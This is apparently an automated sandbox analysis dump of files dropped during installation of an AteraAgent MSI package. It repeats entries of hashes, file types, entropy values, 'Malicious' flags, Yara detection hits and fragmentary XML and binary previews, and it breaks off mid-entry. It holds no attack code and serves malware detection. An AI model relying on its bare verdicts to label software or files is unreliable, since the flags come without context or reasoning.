                                                                                                                                                                                                                                                                                                                                  SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                                                                  MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                                                                  SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                                                                  SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                                                                  SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIC961.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1538
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                                                                  MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                                                                  SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                                                                  SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                                                                  SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):184240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                                                                  MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                                                                  SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                                                                  SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):711952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                                                                  MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                                                                  SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                                                                  SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):61448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                                                                  MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                                                                  SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                                                                  SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                                                                  SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):521954
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                                                                  MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                                                                  SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                                                                  SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                                                                  SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                                                                  MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                                                                  SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                                                                  SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                                                                  SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1538
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                                                                  MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                                                                  SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                                                                  SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                                                                  SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):184240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                                                                  MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                                                                  SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                                                                  SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):711952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                                                                  MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                                                                  SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                                                                  SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):61448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                                                                  MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                                                                  SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                                                                  SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                                                                  SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):437342
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.648131145109059
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ht3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4KsA:/zOE2Z34KGzOE2Z34Kz
                                                                                                                                                                                                                                                                                                                                  MD5:2FCDFC2032D94DE5CB9DD0B261AD9992
                                                                                                                                                                                                                                                                                                                                  SHA1:5BCC5F36ABF8715B6A7F0123708E3069BE50CF96
                                                                                                                                                                                                                                                                                                                                  SHA-256:9F4489A6028EDEF0B3479D0936888BBDDC96B1A8344D951F96A1A31C344658A3
                                                                                                                                                                                                                                                                                                                                  SHA-512:5DE76598FF75543F84D8F67D53099ECBF4260DC953789B1E1A435D03C9D5A1A3F5D611B6E61490475D584A35200E6F377CECE698A7471A907AADC93FA5903005
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIDEDF.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent..Arquivo_4593167.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[..............
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):216496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                                                                  MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                                                                  SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                                                                  SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):216496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                                                                  MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                                                                  SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                                                                  SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):216496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                                                                  MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                                                                  SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                                                                  SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):521954
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                                                                  MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                                                                  SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                                                                  SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                                                                  SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                                                                  MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                                                                  SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                                                                  SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                                                                  SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1538
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                                                                  MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                                                                  SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                                                                  SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                                                                  SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):184240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                                                                  MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                                                                  SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                                                                  SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
